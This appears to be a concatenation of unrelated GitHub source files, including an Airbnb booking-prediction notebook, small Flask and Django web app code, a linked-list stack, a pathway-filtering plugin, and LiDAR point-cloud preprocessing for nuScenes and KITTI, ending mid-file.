= select.transform(X_test)\n\n # Fit Classifier with training data\n clf.fit(X_train_selected, y_train)\n print(\"k={}\".format(k))\n\n # Show training score\n score_train = clf.score(X_train_selected, y_train)\n print(\"Train Score with all features: {:.3f}%\"\n .format(score_train * 100))\n\n # Show test score\n score_test = clf.score(X_test_selected, y_test)\n print(\"Test Score with all features: {:.3f}%\"\n .format(score_test * 100))\n\n # Show selected features\n mask = select.get_support()\n\n # visualize the mask -- black is True, white is False\n plt.matshow(mask.reshape(1, -1), cmap='gray_r')\n plt.xlabel('best {} features'.format(k))\n selected_features = [c for c, s in zip(features.columns, mask) if s]\n print(selected_features)\n print('\\n')\n return score_train, score_test, selected_features\n\n\n# In[80]:\n\ndef print_result(train_R2, test_R2, support_vector):\n print('Final train R2: {:.4f}'.format(train_R2))\n print('Final test R2: {:.4f}'.format(test_R2))\n print('Final select_features:')\n for feature in support_vector:\n print(feature)\n\n\n# ## Preprocessing\n\n# ### Drop Useless Features\n\n# In[81]:\n\nusers_dropna.sample(5)\n\n\n# In[82]:\n\ncols = list(users.columns)\ncols\n\n\n# In[83]:\n\ncols_to_drop = ['id', 'date_account_created',\n 'timestamp_first_active', 'date_first_booking']\n\n\n# In[84]:\n\nusers_dropna = users_dropna.drop(cols_to_drop, axis=1)\n\n\n# In[85]:\n\nusers_dropna.sample(5)\n\n\n# ## Supervised Learning (Regression)\n\n# Predict the time between creating the account and booking\n\n# In[86]:\n\nfrom sklearn.svm import SVR\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.linear_model import Ridge\nfrom sklearn.linear_model import Lasso\nfrom sklearn.tree import DecisionTreeRegressor\n\n\n# - Linear Regression\n# - Ridge Regression\n# - Lasso Regression\n# - Decision Tree Regressor\n# - Support Vector Machine Regressor\n\n# ### features, target split\n\n# In[74]:\n\nusers_dropna.sample(5)\n\n\n# In[91]:\n\ntarget_name_rgs = ['time_delta_bc']\n\n\n# In[92]:\n\ncols_to_drop_rgs = target_name_rgs + ['date_first_booking_month']\n\n\n# In[93]:\n\nfeatures_rgs, target_rgs = users_dropna.drop(\n cols_to_drop_rgs, axis=1), users_dropna[target_name_rgs]\n\n\n# In[94]:\n\nfeatures_rgs.sample(5)\n\n\n# In[95]:\n\ntarget_rgs.sample(5)\n\n\n# ### Encoding Categorical Data\n\n# In[96]:\n\nfeatures_rgs.dtypes\n\n\n# In[97]:\n\nfeatures_num_rgs = ['age', 'signup_flow']\nfeatures_num_rgs\n\n\n# In[98]:\n\nfeatures_cat_rgs = list(features_rgs.columns.difference(features_num_rgs))\nfeatures_cat_rgs\n\n\n# In[153]:\n\nfeatures_rgs, fe_cat_map_rgs = encode_features(features_rgs, features_cat_rgs)\n\n\n# In[154]:\n\nfeatures_rgs.sample(5)\n\n\n# In[155]:\n\nfe_cat_map_rgs\n\n\n# ### Feature Scaling\n\n# In[156]:\n\ndef scale_features(features, cols=None):\n \"\"\"Scale selected features to oridinal\"\"\"\n features_scaled = features.copy(deep=True)\n\n cols = cols if cols else list(features.columns)\n\n feature_scaling_map = {col: StandardScaler() for col in cols}\n\n for col in cols:\n features_scaled[col] = feature_scaling_map[col].fit_transform(\n features_scaled[col])\n\n return features_scaled, feature_scaling_map\n\n\n# In[157]:\n\nfeatures_rgs, fs_map_rgr = scale_features(features_rgs)\n\n\n# In[158]:\n\nfeatures_rgs.sample(5)\n\n\n# In[159]:\n\nfs_map_rgr\n\n\n# ### flatten target dimensions\n\n# In[160]:\n\ntarget_rgs.sample(5)\n\n\n# In[161]:\n\ntarget_rgs = np.ravel(target_rgs)\ntarget_rgs\n\n\n# ### Linear Regression\n\n# In[162]:\n\nlin 
= LinearRegression()\neval_on_data(features_rgs, target_rgs, lin)\n\n\n# ### Lasso\n\n# In[94]:\n\nlasso = Lasso()\neval_on_data(features_rgs, target_rgs, lasso)\n\n\n# In[95]:\n\nfor alpha in [0.2, 0.4, 0.6, 0.8, 1]:\n print('alpha {}'.format(alpha))\n lasso = Lasso(alpha=alpha)\n select_features(features_rgs, target_rgs, lasso)\n\n\n# ### SVM\n\n# In[96]:\n\n# svr = SVR()\n# select_features(features_rgs, target_rgs, svr, max_k=3)\n\n\n# ### Decision Tree\n\n# #### tuning max depth\n\n# In[97]:\n\nmax_test_scores = dict()\nfor max_depth in range(2, 16 + 1):\n print('max depth: {}'.format(max_depth))\n dtr = DecisionTreeRegressor(max_depth=max_depth)\n k, _, scores_test = select_features(features_rgs, target_rgs, dtr)\n max_test_scores[max_depth] = max(\n list(zip(scores_test, k)), key=lambda sk: sk[0])\n\n\n# In[98]:\n\nmax_test_scores\n\n\n# #### tuning max leaf nodes\n\n# In[99]:\n\nmax_test_scores = dict()\nfor min_samples_leaf in range(38, 48, 1):\n print('min samples leaf: {}'.format(min_samples_leaf))\n dtr = DecisionTreeRegressor(\n max_depth=11, min_samples_leaf=min_samples_leaf)\n k, _, scores_test = select_features(features_rgs, target_rgs, dtr)\n max_test_scores[min_samples_leaf] = max(\n list(zip(scores_test, k)), key=lambda sk: sk[0])\n\n\n# In[100]:\n\nmax_test_scores\n\n\n# ## Supervised Learning (Classification) Time Diff \n\n# #### transform the time_delta_bc to a categorical data \n\n# In[183]:\n\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.svm import SVC\nfrom sklearn.ensemble import AdaBoostClassifier\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nimport numpy as np\nimport pandas as pd \n\n\n# In[163]:\n\nusers_dropna['time_delta_bc'].describe()\n\n\n# In[164]:\n\ndef group(c):\n if c['time_delta_bc'] < 1:\n return '0'\n elif 1 <= c['time_delta_bc'] < 4:\n return '1'\n elif 4 <= c['time_delta_bc'] < 46:\n return '2'\n else:\n return '3'\n\n\n# In[165]:\n\nusers_dropna['time_delta_c'] = users_dropna.apply(group, axis=1)\n\n\n# In[166]:\n\nusers_dropna.dtypes\n\n\n# In[167]:\n\n# convert it to categorical variable \nusers_dropna['time_delta_c'] = users_dropna['time_delta_c'].astype('category')\n\n\n# ### prepare\n\n# In[168]:\n\ntarget_name_clf = ['time_delta_c'] \n\n\n# In[169]:\n\n# drop the useless cols \ncols_to_drop_clf = ['time_delta_bc',\n 'date_first_booking_month',\n 'country_destination'] + target_name_clf\ncols_to_drop_clf\n\n\n# In[170]:\n\nfeatures_clf, target_clf = users_dropna.drop(\n cols_to_drop_clf, axis=1), users_dropna[target_name_clf]\n\n\n# In[171]:\n\n# numeric variables \nfeatures_num_clf = ['age', 'signup_flow']\nfeatures_num_clf\n\n\n# In[172]:\n\n# what categorical variables I used \nfeatures_cat_clf = list(features_clf.columns.difference(features_num_clf))\nfeatures_cat_clf\n\n\n# In[173]:\n\nfeatures_clf, fe_cat_map_clf = encode_features(features_clf, features_cat_clf)\n\n\n# In[174]:\n\n# convert targers \ntarget_clf, te_cat_map_clf = encode_features(target_clf, target_name_clf)\n\n\n# In[175]:\n\nte_cat_map_clf\n\n\n# In[176]:\n\ntarget_clf = np.ravel(target_clf)\ntarget_clf\n\n\n# In[177]:\n\n# feature scaling \nfeatures_clf, fs_map_clf = scale_features(features_clf)\n\n\n# In[178]:\n\nfeatures_clf.sample(5)\n\n\n# In[179]:\n\nfs_map_clf\n\n\n# ### Decision Trees \n\n# In[180]:\n\ndtc = DecisionTreeClassifier(random_state=523)\nselect_features(features_clf, target_clf, dtc)\n\n\n# In[196]:\n\nselect_features_model(features_clf, target_clf, dtc, 
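# NOTE: select_features_model() as defined above accepts (features, target, clf,
# threshold, verbose) only, so the selector=RFE / numX keyword arguments in these
# calls raise a TypeError as written; select_features_RFE(features_clf, target_clf,
# dtc, numX=...) is the helper that actually performs recursive feature elimination.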
selector=RFE)\n\n\n# In[197]:\n\nselect_features_model(features_clf, target_clf, dtc, selector=RFE, numX=2)\n\n\n# ### Logistic Regression \n\n# In[198]:\n\nlrc = LogisticRegression(random_state=523)\nselect_features(features_clf, target_clf, lrc)\n\n\n# ### SVM\n\n# In[199]:\n\nsvc = SVC()\nselect_features(features_clf, target_clf, svc, max_k=3)\n\n\n# ### Random Forest \n\n# In[200]:\n\nrfc = RandomForestClassifier()\nselect_features(features_clf, target_clf, rfc)\n\n\n# ### Boosting \n\n# In[201]:\n\nadbc = AdaBoostClassifier(DecisionTreeClassifier())\nselect_features(features_clf, target_clf, adbc)\n\n\n# ## Supervised Learning (Classification)\n\n# Predict which country a new user's first booking destination will be. \n\n# - Decision Tree\n# - Logistic regression \n# - SVM \n# - Ensemble\n# - Boosting\n# - Random Forest\n\n# In[102]:\n\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.svm import SVC\nfrom sklearn.ensemble import AdaBoostClassifier\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier\n\n\n# ### features, target split\n\n# We need to get rid of anything related to first booking. Since we would know the country destination had we known the first booking.\n\n# In[136]:\n\nusers_dropna.sample(5)\n\n\n# In[137]:\n\nusers_dropna.columns\n\n\n# In[138]:\n\ntarget_name_clf = ['country_destination']\n\n\n# In[139]:\n\ncols_to_drop_clf = ['time_delta_bc',\n 'date_first_booking_month'] + target_name_clf\ncols_to_drop_clf\n\n\n# In[140]:\n\nfeatures_clf, target_clf = users_dropna.drop(\n cols_to_drop_clf, axis=1), users_dropna[target_name_clf]\n\n\n# In[141]:\n\nfeatures_clf.sample(5)\n\n\n# In[142]:\n\ntarget_clf.sample(5)\n\n\n# ### Encoding Categorical Data\n\n# #### Convert Features\n\n# In[143]:\n\nfeatures_clf.dtypes\n\n\n# In[144]:\n\nfeatures_num_clf = ['age', 'signup_flow']\nfeatures_num_clf\n\n\n# In[145]:\n\nfeatures_cat_clf = list(features_clf.columns.difference(features_num_clf))\nfeatures_cat_clf\n\n\n# In[146]:\n\nfeatures_clf, fe_cat_map_clf = encode_features(features_clf, features_cat_clf)\n\n\n# In[148]:\n\nfeatures_clf.sample(5)\n\n\n# In[147]:\n\nfe_cat_map_clf\n\n\n# #### Convert Targets\n\n# In[149]:\n\ntarget_clf, te_cat_map_clf = encode_features(target_clf, target_name_clf)\n\n\n# In[150]:\n\ntarget_clf.sample(5)\n\n\n# In[151]:\n\nte_cat_map_clf\n\n\n# In[153]:\n\ntarget_clf = np.ravel(target_clf)\ntarget_clf\n\n\n# ### Feature Scaling\n\n# In[155]:\n\nfeatures_clf.sample(5)\n\n\n# In[152]:\n\nfeatures_clf, fs_map_clf = scale_features(features_clf)\n\n\n# In[157]:\n\nfeatures_clf.sample(5)\n\n\n# for classification\n\n# In[158]:\n\nfs_map_clf\n\n\n# ### Decision Trees\n\n# In[ ]:\n\ndtc = DecisionTreeClassifier(random_state=523)\nselect_features(features_clf, target_clf, dtc)\n\n\n# In[175]:\n\nselect_features_perc(features_clf, target_clf, dtc, max_perc=35, inc=5)\n\n\n# In[194]:\n\nselect_features_model(features_clf, target_clf, dtc, selector=RFE)\n\n\n# In[193]:\n\nselect_features_model(features_clf, target_clf, dtc, selector=RFE, numX=2)\n\n\n# In[192]:\n\nselect_features_model(features_clf, target_clf, dtc, selector=RFE, numX=4)\n\n\n# ### Logistic Regression\n\n# In[160]:\n\nlrc = LogisticRegression(random_state=523)\nselect_features(features_clf, target_clf, lrc)\n\n\n# ### SVM\n\n# In[162]:\n\nsvc = SVC()\nselect_features(features_clf, target_clf, svc, max_k=3)\n\n\n# ### Random Forest\n\n# In[161]:\n\nrfc = RandomForestClassifier()\nselect_features(features_clf, target_clf, 
rfc)\n\n\n# ### Boosting\n\n# In[163]:\n\nadbc = AdaBoostClassifier(DecisionTreeClassifier())\nselect_features(features_clf, target_clf, adbc)\n\n\n# # Reflection\n\n# ## Conclusion\n\n# ## Issues\n","repo_name":"ccihiocil1/MyProjects","sub_path":"PythonAirbnbKaggle/Airbnb_code.py","file_name":"Airbnb_code.py","file_ext":"py","file_size_in_byte":27226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36172100053","text":"import csv\nimport os\nfrom mybookreview import app\n\n\ndef main():\n f = open(\"books.csv\")\n reader = csv.reader(f)\n header = next(reader)\n\n print(\"Running script ... \")\n for isbn, title, author, year in reader:\n db.execute(\"INSERT INTO books(isbn, title, author, year) VALUES(:i, :t, :a, :y)\", {\"i\": isbn, \"t\": title, \"a\": author, \"y\": year})\n\n db.commit()\n \n print(\"Completed ... \")\n\n\nif __name__ == \"__main__\":\n\n app.run(\n host=os.environ.get(\"IP\"),\n port=int(os.environ.get(\"PORT\")),\n debug=os.environ.get(\"DEBUG\")\n )","repo_name":"struk49/my-book-review-app","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"35589096351","text":"# This is to implement Stack using Linked List\nclass node:\n \n data = None\n next = None\n\n def __init__(self):\n self.data = None\n self.next = None\n \n def add_data(self, data):\n self.data = data\n \n def add_next(self, node):\n self.next = node\n\nclass stack:\n\n head = None\n\n def __init__(self):\n self.head = None\n\n def add_head(self, node):\n self.head = node\n \n def push(self, node):\n temp = self.head\n while(temp.next != None):\n temp = temp.next\n temp.next = node\n \n def pop(self):\n temp = self.head\n while(temp.next.next != None):\n temp = temp.next\n temp.next = None\n\n def print_stack(self):\n temp = self.head\n temp_list = []\n while(temp.next != None):\n temp_list.append(temp.data)\n temp = temp.next\n temp_list.append(temp.data)\n print(temp_list)\n\nn1 = node()\nn1.add_data(1)\nn2 = node()\nn2.add_data(2)\nn3 = node()\nn3.add_data(3)\nn4 = node()\nn4.add_data(4)\nn5 = node()\nn5.add_data(5)\ns = stack()\ns.add_head(n1)\ns.push(n2)\ns.push(n3) \ns.push(n4) \ns.push(n5)\ns.print_stack()\ns.pop()\ns.print_stack()\nn6 = node()\nn6.add_data(6)\ns.push(n6)\ns.print_stack() \n","repo_name":"trishantpahwa/Python_Data_Structures","sub_path":"Stack/Stack_Linked_List.py","file_name":"Stack_Linked_List.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"39008398322","text":"from django.contrib import messages\nfrom django.contrib.auth import authenticate, login\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.forms import AuthenticationForm\nfrom django.shortcuts import render, redirect, get_object_or_404\nimport requests\n# Create your views here.\nfrom donate.models import Donate_Post\nfrom home.forms import UserRegisterForm, UserUpdateForm, ProfileUpdateForm\nfrom home.models import Profile\n\n\ndef index(request):\n if request.user.is_authenticated:\n prof = Profile.objects.get(user=request.user)\n print(prof.user)\n if (prof.city==None or prof.state==None or prof.pinCode==None):\n print(\"complete profile plis\")\n messages.success(request, f'Please complete your Profile {prof.user} .... 
by going to profile and filling your address details!')\n return render(request, 'home/homepage.html')\n\ndef register(request):\n if request.method == 'POST':\n form = UserRegisterForm(request.POST)\n if form.is_valid():\n form.save()\n username = form.cleaned_data.get('username')\n messages.success(request, f'Account created successfully {username}!')\n return redirect('index')\n else:\n form = UserRegisterForm()\n return render(request, 'home/register.html', {'form': form})\n\n\n@login_required\ndef profile(request):\n posts = Donate_Post.objects.filter(author=request.user).order_by('-created')\n Cposts = Donate_Post.objects.filter(author=request.user).filter(availableitems=\"Clothes\")\n Fposts = Donate_Post.objects.filter(author=request.user).filter(availableitems=\"Food\")\n Tposts = Donate_Post.objects.filter(author=request.user).filter(availableitems=\"Toys\")\n Bposts = Donate_Post.objects.filter(author=request.user).filter(availableitems=\"Books\")\n Oposts = Donate_Post.objects.filter(author=request.user).filter(availableitems=\"Others\")\n if request.method == 'POST':\n u_form = UserUpdateForm(request.POST, instance=request.user)\n p_form = ProfileUpdateForm(request.POST, request.FILES, instance=request.user.profile)\n if u_form.is_valid() and p_form.is_valid():\n u_form.save()\n p_form.save()\n messages.success(request, f'Account updated successfully!')\n return redirect('profile')\n else:\n u_form = UserUpdateForm(instance=request.user)\n p_form = ProfileUpdateForm(instance=request.user.profile)\n context = {\n 'Cposts': Cposts,\n 'u_form': u_form,\n 'p_form': p_form,\n 'posts': posts,\n 'Fposts': Fposts,\n 'Tposts': Tposts,\n 'Bposts': Bposts,\n 'Oposts': Oposts\n }\n return render(request, 'home/profile.html', context)\n\n\ndef rewards(request):\n post = get_object_or_404(Profile, user=request.user)\n if post.coupons_achieved == 0:\n messages.info(request, f'No coupouns recieved till now.')\n\n context = {\n 'post': post,\n\n }\n return render(request, 'home/rewards.html', context)","repo_name":"pranita7/SOAD_Project","sub_path":"home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9928182920","text":"import sys\n#import numpy\n#from plugins.CSV2GML.CSV2GMLPlugin import *\nfrom CSV2GML.CSV2GMLPlugin import *\nimport PyPluMA\n\n\nclass FilterPathwayPlugin(CSV2GMLPlugin):\n def input(self, filename):\n # Format expected:\n # correlationfile <somefile.csv>\n # pathwayfile <somefile.txt>\n thefile = open(filename, 'r')\n for line in thefile:\n myline = line.strip()\n entries = myline.split('\\t')\n if (entries[0] == 'correlationfile'):\n self.myfile = PyPluMA.prefix()+\"/\"+entries[1]\n elif (entries[0] == 'pathwayfile'):\n self.mypathways = PyPluMA.prefix()+\"/\"+entries[1]\n # Ignore everything else\n\n def run(self):\n # Read CSV file\n filestuff = open(self.myfile, 'r')\n self.firstline = filestuff.readline().strip()\n self.bacteria = self.firstline.split(',')\n if (self.bacteria.count('\\\"\\\"') != 0):\n self.bacteria.remove('\\\"\\\"')\n self.n = len(self.bacteria)\n self.ADJ = []\n i = 0\n for line in filestuff:\n contents = line.split(',')\n self.ADJ.append([])\n for j in range(self.n):\n value = float(contents[j+1])\n self.ADJ[i].append(value)\n i += 1\n # Read Pathways file\n self.keeplines = []\n pathwaystuff = open(self.mypathways, 'r')\n for line in pathwaystuff:\n myline = line.strip()\n myline = 
myline[myline.find('INVOLVES:')+9:]\n elements = myline.split('\\t')\n while (elements.count('') != 0):\n elements.remove('')\n bioelements = []\n for item in elements:\n for j in range(len(self.bacteria)):\n if (item[0] == 'X' and item[1].isdigit()):\n if (self.bacteria[j] == item or \n self.bacteria[j] == '\"'+item+'\"'): #Exactly matching metabolite\n bioelements.append(j)\n elif (self.bacteria[j].find(item) != -1): #Containing bateria name\n bioelements.append(j)\n #print \"FOUND BACTERIA: \", item, \" AND \", self.bacteria[j]\n \n # Look for at least one edge with two bioelements\n keep = []\n for j in range(len(bioelements)):\n keep.append(False)\n flag = False\n for j in range(len(bioelements)):\n for k in range(j+1, len(bioelements)):\n if (self.ADJ[bioelements[j]][bioelements[k]] != 0):\n keep[j] = True\n keep[k] = True\n flag = True\n if (flag):\n myline2 = line.strip()\n linetokeep = myline2[:myline2.find('INVOLVES:')+9]\n for j in range(len(bioelements)):\n if keep[j]:\n linetokeep += '\\t' + self.bacteria[bioelements[j]]\n linetokeep += '\\n'\n self.keeplines.append(linetokeep)\n #for j in range(len(bioelements)):\n # for k in range(len(bioelements)):\n # self.ADJ2[bioelements[j]][bioelements[k]] = 1\n\n #for i in range(self.n):\n # for j in range(self.n):\n # self.ADJ[i][j] *= self.ADJ2[i][j]\n\n\n def output(self, filename):\n filestuff2 = open(filename, 'w')\n for line in self.keeplines:\n filestuff2.write(line)\n #filestuff2.write(self.firstline+\"\\n\")\n\n #for i in range(self.n):\n # filestuff2.write(self.bacteria[i]+',')\n # for j in range(self.n):\n # filestuff2.write(str(self.ADJ[i][j]))\n # if (j < self.n-1):\n # filestuff2.write(\",\")\n # else:\n # filestuff2.write(\"\\n\")\n\n\n\n","repo_name":"movingpictures83/FilterPathway","sub_path":"FilterPathwayPlugin.py","file_name":"FilterPathwayPlugin.py","file_ext":"py","file_size_in_byte":3626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22603016378","text":"import os\nimport numpy as np\nimport glob\nimport argparse\nfrom tqdm import tqdm\nfrom nuscenes import NuScenes\nfrom pyquaternion import Quaternion\nimport av2.utils.io as io_utils\n\ndef parse_arg():\n parser = argparse.ArgumentParser(description=\"Preprocess Parameter\")\n parser.add_argument('--root', type=str, default='', help='Dataset path.')\n parser.add_argument('--save_path', type=str, default='', help='Path to save processed dataset')\n parser.add_argument('--scenes_list', type=str, default='', help='Path of the scene list to be used in the dataset.')\n parser.add_argument('--dataset', type=str, default='', help='which dataset')\n parser.add_argument('--min_dist', type=float, default=3.0, help='Points < Min dist will be removed.')\n parser.add_argument('--max_dist', type=float, default=50.0, help='Points > Max dist will be removed.')\n parser.add_argument('--max_height', type=float, default=4.0, help='Points > Max height will be removed.')\n parser.add_argument('--remove', action='store_true', help='whether rm')\n args = parser.parse_args()\n\n return args\n\n\ndef my_ransac(data,\n distance_threshold=0.3,\n P=0.99,\n sample_size=3,\n max_iterations=10000,\n ):\n \"\"\"\n :param data:\n :param sample_size:\n :param P :\n :param distance_threshold:\n :param max_iterations:\n :return:\n \"\"\"\n # np.random.seed(12345)\n random.seed(12345)\n max_point_num = -999\n i = 0\n K = 10\n L_data = len(data)\n R_L = range(L_data)\n\n while i < K:\n s3 = random.sample(R_L, sample_size)\n\n if 
abs(data[s3[0],1] - data[s3[1],1]) < 3:\n continue\n \n coeffs = estimate_plane(data[s3,:], normalize=False)\n if coeffs is None:\n continue\n\n r = np.sqrt(coeffs[0]**2 + coeffs[1]**2 + coeffs[2]**2 )\n d = np.divide(np.abs(np.matmul(coeffs[:3], data.T) + coeffs[3]) , r)\n d_filt = np.array(d < distance_threshold)\n near_point_num = np.sum(d_filt,axis=0)\n\n if near_point_num > max_point_num:\n max_point_num = near_point_num\n\n best_model = coeffs\n best_filt = d_filt\n\n w = near_point_num / L_data\n\n wn = np.power(w, 3)\n p_no_outliers = 1.0 - wn\n \n K = (np.log(1-P) / np.log(p_no_outliers))\n\n i += 1\n if i > max_iterations:\n print(' RANSAC reached the maximum number of trials.')\n break\n\n return np.argwhere(best_filt).flatten(), best_model\n\n\ndef estimate_plane(xyz, normalize=True):\n \"\"\"\n :param xyz: 3*3 array\n x1 y1 z1\n x2 y2 z2\n x3 y3 z3\n :return: a b c d\n model_coefficients.resize (4);\n model_coefficients[0] = p1p0[1] * p2p0[2] - p1p0[2] * p2p0[1];\n model_coefficients[1] = p1p0[2] * p2p0[0] - p1p0[0] * p2p0[2];\n model_coefficients[2] = p1p0[0] * p2p0[1] - p1p0[1] * p2p0[0];\n model_coefficients[3] = 0;\n // Normalize\n model_coefficients.normalize ();\n // ... + d = 0\n model_coefficients[3] = -1 * (model_coefficients.template head<4>().dot (p0.matrix ()));\n \"\"\"\n vector1 = xyz[1,:] - xyz[0,:]\n vector2 = xyz[2,:] - xyz[0,:]\n\n if not np.all(vector1):\n print('will divide by zero..')\n return None\n dy1dy2 = vector2 / vector1\n\n if not ((dy1dy2[0] != dy1dy2[1]) or (dy1dy2[2] != dy1dy2[1])):\n return None\n\n a = (vector1[1]*vector2[2]) - (vector1[2]*vector2[1])\n b = (vector1[2]*vector2[0]) - (vector1[0]*vector2[2])\n c = (vector1[0]*vector2[1]) - (vector1[1]*vector2[0])\n # normalize\n if normalize:\n r = np.sqrt(a ** 2 + b ** 2 + c ** 2)\n a = a / r\n b = b / r\n c = c / r\n d = -(a*xyz[0,0] + b*xyz[0,1] + c*xyz[0,2])\n # return a,b,c,d\n return np.array([a,b,c,d])\n\n\nclass PreprocessNuscenes:\n def __init__(self, root, save_path, scenes_list, min_dist = 3.0, max_dist = 50.0, max_height = 4.0):\n self.min_dist = min_dist\n self.max_dist = max_dist\n self.max_height = max_height\n self.root = root\n self.save_path = save_path\n self.scenes = self.read_scene_list(scenes_list) # scene-0001 ...\n self.max_points = 0\n self.min_points = 10**10\n self.save_processed()\n \n \n def read_scene_list(self, scenes_list):\n # read .txt file containing train/val scene number\n scenes = []\n with open(scenes_list, 'r') as f:\n for line in f.readlines():\n line = line.strip('\\n')\n scenes.append(line)\n return scenes\n\n def load_calibrated_para(self, cur_scene, filename):\n for scene in self.nusc.scene:\n if scene['name'] == cur_scene:\n start_sample_rec = self.nusc.get('sample', scene['first_sample_token'])\n sd_rec = self.nusc.get('sample_data', start_sample_rec['data']['LIDAR_TOP'])\n\n # Make list of frames\n cur_sd_rec = sd_rec\n sd_tokens = []\n sd_tokens.append(cur_sd_rec['token'])\n while cur_sd_rec['next'] != '':\n cur_sd_rec = self.nusc.get('sample_data', cur_sd_rec['next'])\n sd_tokens.append(cur_sd_rec['token'])\n if cur_sd_rec['filename'] == filename:\n break\n break\n\n sc_rec = self.nusc.get('sample_data', sd_tokens[-1])\n lidar_token = sc_rec['token']\n lidar_rec = self.nusc.get('sample_data', lidar_token)\n calibrated = self.nusc.get('calibrated_sensor', lidar_rec['calibrated_sensor_token'])\n rot = np.array(calibrated['rotation'])\n trl = np.array(calibrated['translation'])\n return rot, trl\n \n def load_scene_frames(self, scene):\n # load 
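        # (Aside: estimate_plane() above can be sanity-checked with three
        # near-coplanar points around z ~= -1.7, e.g.
        #     estimate_plane(np.array([[0, 0, -1.70], [1, 2, -1.68], [2, -1, -1.72]]))
        # which returns coefficients close to +/-(0, 0, 1, 1.7). Note that
        # my_ransac() also requires `import random` at the top of this file.)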
frames of the scene and return file list [num_scene_frames]\n file = os.path.join('./scene-split', scene + '.txt')\n timestamps = []\n filenames = []\n with open(file) as f:\n for line in f.readlines():\n line = line.strip('\\n').split(' ')\n filename = line[0]\n timestamp = float(line[1])\n filenames.append(filename)\n timestamps.append(timestamp)\n rot, trl = self.load_calibrated_para(scene, filename)\n return timestamps, filenames, rot, trl # rot and trl is consitent within a scene\n\n def save_processed(self):\n file_path = os.path.join(self.root, 'sweeps', 'LIDAR_TOP')\n idx = 1\n\n for scene in tqdm(self.scenes):\n print(scene)\n if idx < 81:\n print(\"skip\", idx)\n idx += 1\n continue\n print(\"begin\", idx)\n self.nusc = NuScenes(version = 'v1.0-trainval', dataroot=self.root, verbose=True)\n timestamps, filenames, rot, trl = self.load_scene_frames(scene)\n fn_times = []\n scene_save_path = os.path.join(self.save_path, 'scene-split', scene + '.txt')\n for i in tqdm(range(len(filenames))):\n # load .pcd data\n pc_path = file_path + '/' + filenames[i]\n data_save_path = os.path.join(self.save_path, 'sweeps', 'LIDAR_TOP', filenames[i])\n # print(pc_path)\n pc_raw = np.fromfile(pc_path, dtype = np.float32, count = -1)\n if pc_raw.shape[0] % 5 == 0:\n pc_raw = pc_raw.reshape([-1, 5])[:, :4]\n else:\n pc_raw = pc_raw.reshape([-1,4])\n # remove ego car, ground, and max_dist, max_height\n print(\"before rm\", pc_raw.shape[0])\n # rm_min_and_max_dist\n print(\"----rm_min_and_max_dist----\")\n pc_raw[:, :3] = np.dot(pc_raw[:, :3], Quaternion(rot).rotation_matrix)\n for j in range(3):\n pc_raw[:, j] = pc_raw[:, j] + trl[j]\n dist_origin = np.sqrt(np.sum(pc_raw[:, :3] ** 2, axis = 1))\n keep = np.logical_and(self.min_dist <= dist_origin, dist_origin <= self.max_dist)\n pc_raw = pc_raw[keep]\n print(\"points_num\", pc_raw.shape[0])\n\n # rm max_height and ground\n print(\"----rm max_height and ground----\")\n # pc_raw = pc_raw[pc_raw[:, 2] > self.rm_thre]\n indices, _ = my_ransac(pc_raw[:, :3])\n print(indices)\n pc_raw[indices] = self.max_height + 1\n pc_raw = pc_raw[pc_raw[:, 2] <= self.max_height]\n print(\"after rm\", pc_raw.shape)\n fn_times.append(filenames[i] + ' ' + str(timestamps[i]))\n \n pc_raw.tofile(data_save_path)\n print(pc_raw.shape)\n num = pc_raw.shape[0]\n if num < self.min_points:\n self.min_points = num\n if num > self.max_points:\n self.max_points = num\n\n max_h = np.max(pc_raw[:, 2])\n min_h = np.min(pc_raw[:, 2])\n print(\"height\", min_h, max_h)\n print(scene_save_path)\n with open(scene_save_path, \"w\") as f:\n for line in fn_times:\n f.write(line +'\\n')\n print(\"max_p\", self.max_points)\n print(\"min_p\", self.min_points)\n return\n\nclass PreprocessKitti:\n def __init__(self, root, save_path, seq, min_dist = 3.0, max_dist = 50.0, max_height = 4.0):\n self.min_dist = min_dist\n self.max_dist = max_dist\n self.max_height = max_height\n self.root = root\n self.save_path = save_path\n self.seq = seq\n self.velodynes = self.read_seq_velodyne() # scene-0001 ...\n self.max_points = 0\n self.min_points = 10**10\n self.max_height = 0\n self.min_height = 0\n self.save_processed()\n\n def read_seq_velodyne(self):\n # use seq00 for train in general and seq01-10 for validation\n velodyne_path = os.path.join(self.root, \"data_odometry_velodyne\", \"dataset\", \"sequences\", self.seq, \"velodyne\")\n seq_path_list = glob.glob(os.path.join(velodyne_path, '*.bin'))\n seq_path_list = sorted(seq_path_list)\n return seq_path_list\n\n def save_processed(self):\n\n for pc_path in 
